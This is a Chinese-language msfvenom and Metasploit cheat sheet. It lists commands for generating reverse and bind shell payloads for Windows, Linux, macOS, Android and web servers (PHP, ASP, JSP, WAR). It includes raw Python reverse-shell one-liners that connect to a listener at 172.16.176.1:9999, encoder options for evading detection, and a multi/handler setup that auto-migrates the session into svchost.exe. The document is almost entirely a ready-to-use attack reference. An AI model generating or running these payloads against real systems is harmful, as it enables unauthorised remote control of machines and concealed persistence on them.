msfvenom生成payload
msfvenom重要参数
查看payloads: msfvenom --list payloads
查看支持的文件格式:msfvenom --help-formats
查看payload所需参数:msfvenom -p xxx --payload-options
编码参数
-e x86/shikata_ga_nai -i 5 -b "\x00" //使用shikata_ga_nai编码器编码5次并去除空字符
常用payload
windows/shell_bind_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/meterpreter_reverse_tcp
System Payloads
linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f elf > shell.elf
windows
messagebox Test
msfvenom -a x86 -p windows/messagebox TEXT="hello, it is a test"
windows下生成32位/64位payload时需要注意。
msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
以windows/meterpreter/reverse_tcp为例,该payload默认为32位,也可使用-a x86选项指定。
如果要生成64位,则payload为windows/x64/meterpreter/reverse_tcp。
Netcat
nc正向连接
msfvenom -p windows/shell_hidden_bind_tcp rhost=192.168.0.107 lport=8956 -f exe> 1.exe
nc反向连接,监听
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.107 lport=888 -f exe> 1.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=xxx LPORT=xxx -f macho > shell.macho
Android
msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.apk
Web Payloads
php
msfvenom -p php/meterpreter_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f asp > shell.asp
jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.jsp
war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f war > shell.war
python
msfvenom -p cmd/unix/reverse_python LHOST=xxx LPORT=xxx -f raw > shell.py
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.py
正向shell
python/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.176.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
python/python3 -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('172.16.176.1',9999))\nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
bash
msfvenom -p cmd/unix/reverse_bash LHOST=xxx LPORT=xxx -f raw > shell.sh
perl
msfvenom -p cmd/unix/reverse_perl LHOST=xxx LPORT=xxx -f raw > shell.pl
MSF监听
use exploit/multi/handler
set PAYLOAD <Payload name>
set RHOST <RHOST value>
set RPORT <RPORT value>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
其他设置
AutoRunScript:自动执行脚本
如:自动执行post/windows/manage/migrate 模块注入其他进程
set AutoRunScript post/windows/manage/migrate
自动注入进程
set prependmigrate true
set prependmigrateProc svchost.exe
辅助配置
set exitonsession false //可以让建立监听的端口继续保持侦听,可以接受多个session
set stagerverifysslcert false //防止获取shell的时候出现的SSL_accept错误